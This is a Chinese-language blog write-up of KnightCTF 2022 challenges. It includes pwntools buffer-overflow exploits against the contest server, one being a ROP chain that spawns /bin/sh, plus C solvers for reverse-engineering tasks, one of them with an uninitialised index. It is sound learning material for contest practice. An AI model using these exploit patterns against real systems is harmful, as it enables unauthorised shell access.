<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>Knight夺旗战 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="介绍：由孟加拉国第一次举办的为期27小时的夺旗战； KnightCTF做起来二进制方向确实算签到题； 同时KnightCTF偏小众，但是个很好的新手训练平台，能很好的入门各个方向； 但同时KnightCTF有很多个扩展方向，不只是局限于web，re，crypto，pwn，misc； 还有数字取证（Digital Forensics），开源情报（OSINT），隐写（Steganography），网络">
<meta property="og:type" content="article">
<meta property="og:title" content="Knight夺旗战">
<meta property="og:url" content="https://secondbc.github.io/SecondBC/2022/01/26/Knight%E5%A4%BA%E6%97%97%E6%88%98/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="介绍：由孟加拉国第一次举办的为期27小时的夺旗战； KnightCTF做起来二进制方向确实算签到题； 同时KnightCTF偏小众，但是个很好的新手训练平台，能很好的入门各个方向； 但同时KnightCTF有很多个扩展方向，不只是局限于web，re，crypto，pwn，misc； 还有数字取证（Digital Forensics），开源情报（OSINT），隐写（Steganography），网络">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/b004b43013fc6e00.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/37486e2dbc72a52c.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/34fc0241dcca91fb.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/8056e1b5cf33b67a.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/486ae28d23246b16.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/1c52a1179700b3bb.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/faf802a68ce43097.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/0baa9f17310e93b1.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/59489432555a7161.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/3ec25c0b559b237b.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/6b72d9566cfe7adc.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/ac451e10a058345f.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/bef72aa45f3950bd.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/5565f5e41bac9e1a.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/46cdfa92e6abc0d0.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/f8c6efb5cad1264c.png">
<meta property="og:image" content="https://i.bmp.ovh/imgs/2022/01/b2a90553ece4fda1.png">
<meta property="og:image" content="https://s3.bmp.ovh/imgs/2022/01/284e22f5598d00b0.png">
<meta property="article:published_time" content="2022-01-25T17:52:33.000Z">
<meta property="article:modified_time" content="2022-01-26T12:32:33.893Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.bmp.ovh/imgs/2022/01/b004b43013fc6e00.png">
  
    <link rel="alternate" href="/SecondBC/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/SecondBC/css/style.css">

<meta name="generator" content="Hexo 5.4.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/SecondBC/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/SecondBC/">Home</a>
        
          <a class="main-nav-link" href="/SecondBC/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/SecondBC/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://secondbc.github.io/SecondBC"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-Knight夺旗战" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/SecondBC/2022/01/26/Knight%E5%A4%BA%E6%97%97%E6%88%98/" class="article-date">
  <time datetime="2022-01-25T17:52:33.000Z" itemprop="datePublished">2022-01-26</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Knight夺旗战
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="介绍："><a href="#介绍：" class="headerlink" title="介绍："></a>介绍：</h2><p>由孟加拉国第一次举办的为期27小时的夺旗战；</p>
<p>KnightCTF做起来二进制方向确实算签到题；</p>
<p>同时KnightCTF偏小众，但是个很好的新手训练平台，能很好的入门各个方向；</p>
<p>但同时KnightCTF有很多个扩展方向，不只是局限于web，re，crypto，pwn，misc；</p>
<p>还有数字取证（Digital Forensics），开源情报（OSINT），隐写（Steganography），网络（Networking），以及编程（Programming）；</p>
<p>通过这些特殊的方向可以学习到很多有意思的知识；</p>
<p>比如隐写会把秘密写在图片里，或者图片的介绍里；网络会需要用到wireshark，由此还特别下载学习使用；开源情报则是灵活使用谷歌搜索以及其他的爬虫；</p>
<p>通过这次CTF的学习，可以发现很多奇怪的文件都可以转成zip来破解，有些甚至会套娃；</p>
<h2 id="过程："><a href="#过程：" class="headerlink" title="过程："></a>过程：</h2><p>我和我的小队成员也在比赛的过程中互相帮助，揣测思路；尽管二进制很简单，我们能很快解决AK掉，但其他方向和奇怪的谜题也困扰着我们，比如misc的3D建模需要穿模找flag…等等；</p>
<p>一边学习一边讨论一边解题，针对新知识，解题确实让人头大，连续熬夜两天，每天都高强度地盯着屏幕，怕是这样久了头发都掉光；</p>
<p>为什么这么认真呢？因为这是矩阵战队第一次的CTF比赛，我们会团结起来，去拿到一切能拿到的分数，不会说二进制AK我就下班；</p>
<p>在这过程中，我们还误判了结束比赛的时间，导致排名往下掉了不少，最后也是凭着每个人的意志熬了过来；</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/b004b43013fc6e00.png" alt="Certificate"></p>
<p>最后也是成功的拿到了前100的名次得到证书；</p>
<p>虽然都不是什么难题，但确实让人开心；</p>
<p>接下来就是二进制系列的复现了；</p>
<h2 id="Pwn："><a href="#Pwn：" class="headerlink" title="Pwn："></a>Pwn：</h2><h3 id="whats-your-name"><a href="#whats-your-name" class="headerlink" title="whats_your_name"></a>whats_your_name</h3><p>IDA和ROPgadget：</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/37486e2dbc72a52c.png" alt="main"></p>
<p>可以看到主函数很简单，gets输入v4会栈溢出，以便修改v5的值，执行system函数获取flag；</p>
<p>使用ROPgadget会发现有可以控制的寄存器，所以可以玩一点花的；</p>
<p>再使用cyclic命令找到溢出返回的长度；</p>
<p>用got表可以找到plt的偏移；</p>
<p>之前写过ret2libc，那就用那次的经历来写一次；</p>
<p>Exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&#x27;198.211.115.81&#x27;</span>,<span class="number">10001</span>)</span><br><span class="line"></span><br><span class="line">ad = <span class="number">0x404048</span></span><br><span class="line">system = <span class="number">0x401030</span></span><br><span class="line">r15 = <span class="number">0x401242</span></span><br><span class="line">gets = <span class="number">0x401050</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">68</span> + <span class="string">b&#x27;a&#x27;</span>*<span class="number">8</span> + p64(gets) + p64(r15) + p64(ad) + p64(system) + <span class="string">b&#x27;e&#x27;</span>*<span class="number">8</span> +p64(ad)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.sendline(<span class="string">&#x27;/bin/sh&#x27;</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>思路就是，直接去return，先调用gets函数，控制r15寄存器输入 ‘/bin/sh’ 到一段可修改的地址，返回后调用system，直接执行 system(‘/bin/sh’) ；</p>
<p><strong>之后得到flag：KCTF{bAbY_bUfF3r_0v3Rf1Ow}</strong></p>
<h3 id="hackers-vault"><a href="#hackers-vault" class="headerlink" title="hackers_vault"></a>hackers_vault</h3><p>IDA：</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/34fc0241dcca91fb.png" alt="main"></p>
<p>可以发现输入的v4是用%d（整数）格式输入的，之后还有一个运算，最后得出v5的值，如果v5 = 48，就能拿到flag；</p>
<p>其实就是一道非常简单的逆向题；</p>
<p>算法就是每一位数的和，所以只需要输入一串数字，这串数字加起来为48就好了（千万别管溢出！别管int的位数！）</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/8056e1b5cf33b67a.png" alt="answer"></p>
<p><strong>然后就nc到服务器，输入数字得到flag：KCTF{b1NaRy_3xOpL0iTaT1On_r0cK5}</strong></p>
<h3 id="whats-your-name-two"><a href="#whats-your-name-two" class="headerlink" title="whats_your_name_two"></a>whats_your_name_two</h3><p>IDA：</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/486ae28d23246b16.png" alt="main"></p>
<p>查看主函数，发现输入的内容s，会被复制到dest，看栈的结构，可以知道dest后面紧跟v6和v7；</p>
<p>主函数里判断，如果v7和v6满足条件值，就执行system获取flag；</p>
<p>则Exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&#x27;198.211.115.81&#x27;</span>,<span class="number">10002</span>)</span><br><span class="line"></span><br><span class="line">v6 = <span class="number">0x534B544E</span></span><br><span class="line">v7 = <span class="number">0x5445454C</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">72</span> + p32(v6) +p32(v7) </span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p><strong>得到flag：KCTF{bUfF3r_0v3Rf1Ow_i5_fUn_r1Gh7}</strong></p>
<p>偷懒不想玩return了；</p>
<h2 id="Reverse："><a href="#Reverse：" class="headerlink" title="Reverse："></a>Reverse：</h2><h3 id="The-Flag-Vault"><a href="#The-Flag-Vault" class="headerlink" title="The_Flag_Vault"></a>The_Flag_Vault</h3><p>IDA：</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/1c52a1179700b3bb.png" alt="main"></p>
<p>进入主函数看到会让输入字符串s2，然后和s1字符串比较，如果相同，就会输出flag；</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/faf802a68ce43097.png" alt="answer"></p>
<p><strong>输入s1后获得flag：KCTF{welc0me_t0_reverse_3ngineering}</strong></p>
<h3 id="the-encoder"><a href="#the-encoder" class="headerlink" title="the_encoder"></a>the_encoder</h3><p>IDA：</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/0baa9f17310e93b1.png" alt="function"></p>
<p>输入最大40个字符，然后这个for是在判断输入的长度，没什么实际的意义，不会改变输入的值；</p>
<p>之后就会把输入的字符的ascii码加上1337输出；</p>
<p>根据题里的内容，可以知道有如下的数据：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1412</span> <span class="number">1404</span> <span class="number">1421</span> <span class="number">1407</span> <span class="number">1460</span> <span class="number">1452</span> <span class="number">1386</span> <span class="number">1414</span> <span class="number">1449</span> <span class="number">1445</span> <span class="number">1388</span> <span class="number">1432</span> <span class="number">1388</span> <span class="number">1415</span> <span class="number">1436</span> <span class="number">1385</span> <span class="number">1405</span> <span class="number">1388</span> <span class="number">1451</span> <span class="number">1432</span> <span class="number">1386</span> <span class="number">1388</span> <span class="number">1388</span> <span class="number">1392</span> <span class="number">1462</span></span><br></pre></td></tr></table></figure>

<p>所以思路就是：把每个数减去1337，再换成ascii；</p>
<p>代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> box[<span class="number">25</span>] = &#123;<span class="number">1412</span> ,<span class="number">1404</span> ,<span class="number">1421</span> ,<span class="number">1407</span>, <span class="number">1460</span>, <span class="number">1452</span>, <span class="number">1386</span>, <span class="number">1414</span>, <span class="number">1449</span>, <span class="number">1445</span>, <span class="number">1388</span>, <span class="number">1432</span>, <span class="number">1388</span>, <span class="number">1415</span>, <span class="number">1436</span>, <span class="number">1385</span>, <span class="number">1405</span>, <span class="number">1388</span>, <span class="number">1451</span>, <span class="number">1432</span>, <span class="number">1386</span>, <span class="number">1388</span>, <span class="number">1388</span>, <span class="number">1392</span>, <span class="number">1462</span>&#125;;</span><br><span class="line">	<span class="keyword">int</span> i;</span><br><span class="line">	<span class="keyword">char</span> out[<span class="number">25</span>];</span><br><span class="line">	<span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="number">25</span>;i++)</span><br><span class="line">	&#123;</span><br><span class="line">		box[i] = box[i] - <span class="number">1337</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="number">25</span>;i++)</span><br><span class="line">	&#123;</span><br><span class="line">		out[i] = box[i];</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;%s&quot;</span>,out);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>运行后得到flag：KCTF{s1Mpl3_3Nc0D3r_1337}</strong></p>
<h3 id="BabyShark"><a href="#BabyShark" class="headerlink" title="BabyShark"></a>BabyShark</h3><p>这道题的文件是.jar，所以用jd-gui反编译；</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/59489432555a7161.png" alt="main"></p>
<p>可以找到这样两个关键字符串信息内容；</p>
<p>上面一张图的数据后面有等号，可以想到AES，base64加密，于是去尝试解密：</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/3ec25c0b559b237b.png" alt="decrypt"></p>
<p><strong>用base64解密解出flag：KCTF{7H15_W@5_345Y_R16H7?}</strong></p>
<h3 id="flag-checker"><a href="#flag-checker" class="headerlink" title="flag_checker"></a>flag_checker</h3><p>IDA：</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/6b72d9566cfe7adc.png" alt="main"></p>
<p>这道题就是单纯的把输入的字符串v4经过两个for循环的运算之后给已有的v5字符串比较与否；</p>
<p>那么稍微改一下两个for里的算法，改成自己的逆运算，当然，第一个for的逆运算就是它自己，因为 x = -1 - y 就是 y = -1 -       x；用v5的值算回v4就行了；</p>
<p>代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">char</span> in[<span class="number">35</span>],out[<span class="number">35</span>];</span><br><span class="line">	<span class="keyword">int</span> v4[<span class="number">35</span>];</span><br><span class="line">	<span class="keyword">int</span> i,j,v7,v6;</span><br><span class="line">	<span class="built_in">scanf</span>(<span class="string">&quot;%s&quot;</span>,in);	  <span class="comment">//换做v5做运算数 </span></span><br><span class="line">	<span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="number">35</span>;i++)</span><br><span class="line">	&#123;</span><br><span class="line">		v4[i] = in[i];</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">for</span> ( j = <span class="number">0</span>; v4[j]; ++j ) </span><br><span class="line">    	v4[j] += <span class="number">32</span>;	<span class="comment">//改减为加</span></span><br><span class="line">    <span class="keyword">for</span> ( i = <span class="number">0</span>; v4[i]; ++i )	<span class="comment">//这个for不变</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( v4[i] &lt;= <span class="number">64</span> || v4[i] &gt; <span class="number">90</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( v4[i] &lt;= <span class="number">96</span> || v4[i] &gt; <span class="number">122</span> )</span><br><span class="line">        v4[i] = v4[i];</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">        v4[i] = <span class="number">-37</span> - v4[i];</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      v4[i] = <span class="number">-101</span> - v4[i];</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">   	<span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="number">35</span>;i++)</span><br><span class="line">   	&#123;</span><br><span class="line">   		out[i] = v4[i];</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;%s&quot;</span>,out);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>因为是复制的代码用，所以会比较乱，而且写的时候是v4来运算，但实际上输入的数据是v5的；</p>
<p><strong>运行输入后得到flag：KCTF{aTbAsH_cIpHeR_wItH_sOmE_tWiSt}</strong></p>
<h3 id="Knight-Vault"><a href="#Knight-Vault" class="headerlink" title="Knight Vault"></a>Knight Vault</h3><p>IDA：</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/ac451e10a058345f.png" alt="main"></p>
<p>输入v8，让v8经过for循环的运算，再用运算的数据和v7比较与否；</p>
<p>思路还是改写for循环的运算，使其逆向，把v7变回v8；</p>
<p>代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> v7[<span class="number">43</span>];</span><br><span class="line">	<span class="keyword">int</span> v8[<span class="number">43</span>];</span><br><span class="line">	<span class="keyword">char</span> in[<span class="number">43</span>],out[<span class="number">43</span>];</span><br><span class="line">	<span class="keyword">int</span> i;</span><br><span class="line">	<span class="built_in">scanf</span>(<span class="string">&quot;%s&quot;</span>,in);</span><br><span class="line">	<span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="number">43</span>;i++)</span><br><span class="line">	&#123;</span><br><span class="line">		v7[i] = in[i];</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="number">43</span>;i++)</span><br><span class="line">	&#123;</span><br><span class="line">		v8[i] = v7[i] + <span class="number">10</span>;  <span class="comment">//改减为加</span></span><br><span class="line">		<span class="keyword">if</span>( v8[i] == <span class="number">42</span> )	<span class="comment">//两极反转</span></span><br><span class="line">			v8[i] = <span class="number">65</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="number">43</span>;i++)</span><br><span class="line">	&#123;</span><br><span class="line">		out[i] = v8[i];</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;%s&quot;</span>,out);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>运行得到flag：4CTF{sO_yOu_gOt_mE_gOOd_jOOb_hApPy_hAc4iNg}</strong></p>
<h3 id="Droid-Flag"><a href="#Droid-Flag" class="headerlink" title="Droid Flag"></a>Droid Flag</h3><p>这是个安卓APK，用jeb分析：</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/bef72aa45f3950bd.png" alt="main1"></p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/5565f5e41bac9e1a.png" alt="main2"></p>
<p>这是整个onCreate方法；</p>
<p>下方可以看到v1变量在添加flag样式的字符，并且使用getSx函数获取字符串；</p>
<p>如下是getSx系列：</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/46cdfa92e6abc0d0.png" alt="getSx"></p>
<p>它是用16进制下标在字符串里找对应id的字符串，那就进入字符串里寻找；</p>
<p>最后结果：</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/f8c6efb5cad1264c.png" alt="string"></p>
<p>从字符串里看出，就这样输入貌似并不是flag，但是把字符反着输入，就可以拼接成单词了，比如s7代表的 D10RdNa ，反转输入就变为 aNdR01D -&gt; android ；</p>
<p><strong>最后通过这样的字符串拼接方法得到flag：KCTF{aNdR01D_s1MpL3_r3V3rS3}</strong></p>
<h3 id="Knight-Switch-Bank"><a href="#Knight-Switch-Bank" class="headerlink" title="Knight Switch Bank"></a>Knight Switch Bank</h3><p>IDA：</p>
<p><img src="https://i.bmp.ovh/imgs/2022/01/b2a90553ece4fda1.png" alt="main"></p>
<p>输入v5，进入while循环开始选择性的运算，最后还有一个while循环，结束后让运算过的v5与v6比较与否；</p>
<p>这个套路很像之前的 flag_checker 这道题；唯一不同的就是两个循环的样子变了一下；</p>
<p>第一个循环在选择输入的字符：如果是小（大）写字母的前13个，就加13；如果是小（大）写字母的后13个，就减13；如果不是字母，就减32；</p>
<p>第二个循环就是自加2；</p>
<p>跟之前一样，改写一下循环里的东西：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> v4[<span class="number">29</span>],v5[<span class="number">29</span>];</span><br><span class="line">	<span class="keyword">char</span> in[<span class="number">29</span>],out[<span class="number">29</span>];</span><br><span class="line">	<span class="keyword">int</span> i;</span><br><span class="line">	<span class="keyword">int</span> v10;</span><br><span class="line">	<span class="built_in">scanf</span>(<span class="string">&quot;%s&quot;</span>,in);</span><br><span class="line">	<span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="number">29</span>;i++)</span><br><span class="line">	&#123;</span><br><span class="line">		v5[i] = in[i]; <span class="comment">//输入的是原v6，复制用的v5； </span></span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="number">29</span>;i++)</span><br><span class="line">		v5[i] -= <span class="number">2</span>;	<span class="comment">//改加为减 </span></span><br><span class="line">	<span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="number">29</span>;i++)</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( v5[v10] &lt;= <span class="number">64</span> || v5[v10] &gt; <span class="number">77</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( v5[v10] &lt;= <span class="number">96</span> || v5[v10] &gt; <span class="number">109</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="keyword">if</span> ( v5[v10] &lt;= <span class="number">77</span> || v5[v10] &gt; <span class="number">90</span> )</span><br><span class="line">        &#123;</span><br><span class="line">          <span class="keyword">if</span> ( v5[v10] &lt;= <span class="number">109</span> || v5[v10] &gt; <span class="number">122</span> )</span><br><span class="line">            v4[v10] = v5[v10] + <span class="number">32</span>;	<span class="comment">//改非字母的变化为加其他不变 </span></span><br><span class="line">          <span class="keyword">else</span></span><br><span class="line">            v4[v10] = v5[v10] - <span class="number">13</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">          v4[v10] = v5[v10] - <span class="number">13</span>;</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">      &#123;</span><br><span class="line">        v4[v10] = v5[v10] + <span class="number">13</span>;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      v4[v10] = v5[v10] + <span class="number">13</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    ++v10;</span><br><span class="line">  &#125;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">for</span>(i=<span class="number">0</span>;i&lt;<span class="number">29</span>;i++)</span><br><span class="line">	&#123;</span><br><span class="line">		out[i] = v4[i];</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;%s&quot;</span>,out);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>运行后得到flag：KCTF{So_YoU_ROT_iT_gOOd_jOOb}</strong></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>二进制方向要说没收获吧，其实还是有的，就比如安卓逆向和java逆向，当时看到的时候并不知道.getstring()函数是什么东西，更不知道其他点过去点过来的函数；都需要去网上查找学习才能弄懂；</p>
<p>因为简单，然后学习其他方向的内容，也是挺头大的，不过也同时收获很多知识；</p>
<p>比如密码学的RSA的简单了解和运用，web的SQL注入，misc 3D建模以及pacpng后缀文件的运用；</p>
<p>之后就是主打hgame了，在hgame结束的时候也会有这样类似的复盘发布的；</p>
